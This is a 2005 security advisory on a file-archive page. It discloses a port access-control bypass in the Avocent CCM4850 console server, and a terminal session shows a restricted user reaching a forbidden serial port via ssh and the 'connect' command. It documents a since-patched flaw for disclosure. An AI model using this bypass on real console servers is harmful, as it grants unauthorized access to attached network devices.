what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

avocents.txt

avocents.txt
Posted Sep 22, 2005
Authored by Dr. Dirk Wetter | Site drwetter.org

Avocents CCM console server has a flaw which enables users to bypass access control by using ssh with standard password based authentication. Tested on S/W Version 2.1, CCM4850.

tags | advisory
SHA-256 | d015b3ec967178a10f8a428777c7574d16032315ea1b85d776379013351c5708

avocents.txt

Change Mirror Download
Hi,

this is another bug I found during my research on console servers
which is presumably fixed by now. So here you go:


Summary:
Port Access Control Bypass Vulnerability


Details:

Avocents CCM console server have a flaw which enables users to
bypass access control by using ssh with standard password based
authentication. On modern console servers you can set port permissions
per user basis. Research showed however that in this case access control
failed if you ssh directly into the console server with your user account
and then use the "connect" command to access the illegitimate serial
port. Which means that every user can access consoles of every device
hooked up. ssh'ing directly to the tcp port representing the serial port
didn't show this flaw.


Vulnerable Versions:
Tested on S/W Version 2.1, CCM4850


Patches/Workarounds:
Vendor has released firmware 2.3 which according to the vendor fixes
this problem also if the release notes don't mention this. See:

ftp://ftp.avocent.com/public/product-upgrades/$ds1800/CCMx50%20Series/CCMx50%27s_AV_2.3/

"Exploit:"
Design Flaw, exploit not needed. This is for demonstration:


TCP-Port 3101 is -- if enabled serial port 1.
User mylocal should have access only to ports 2 through 48. Direct
access to 3101/tcp is correctly denied. However connecting to the
Avocent first using mylocal account and then use connect command
allows access to this port. In this experiment a cisco switch is
hooked up to serial port 1.

-------- snip


~/console/lab-notizen/avo|19% ssh Admin@ccm
Admin@ccm's password:
Avocent CCM4850 S/W Version 2.1


> show user
User: Admin
Level: Appliance Administrator
Access: PALL,USER,SCON,SMON,PCON,BREAK
Groups:
Port Access: BY PORT
Locked: N/A
Last Login: 00 10:17:11

Port Username Duration Socket From Socket
CLI Admin 00 00:00:04 22 0.0.0.0(58798)
> show user mylocal
User: mylocal
Level: User
Access: P2-48,BREAK
Groups:
Port Access: BY PORT
Locked: NO
Last Login: 00 08:10:24
>
>Connection to ccm closed
~/console/lab-notizen/avo|20% ssh mylocal@ccm -p 3101
mylocal@ccm's password:
Received disconnect from 192.168.100.209: 2: Access denied - No access to port 1
~/console/lab-notizen/avo|21% ssh mylocal@ccm
mylocal@ccm's password:
Avocent CCM4850 S/W Version 2.1


> connect 1
Connected to Port: 1 9600,8,N,1,NONE

cisco#Connection to ccm closed.
~/console/lab-notizen/avo|22%


-------- snap
(see also http://drwetter.org/cs-probs)


Cheers,
Dirk




--
Dr. Dirk Wetter http://drwetter.org
Consulting IT-Security + Open Source
Key fingerprint = 80A2 742B 8195 969C 5FA6 6584 8B6E 59C1 E41B 9153


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close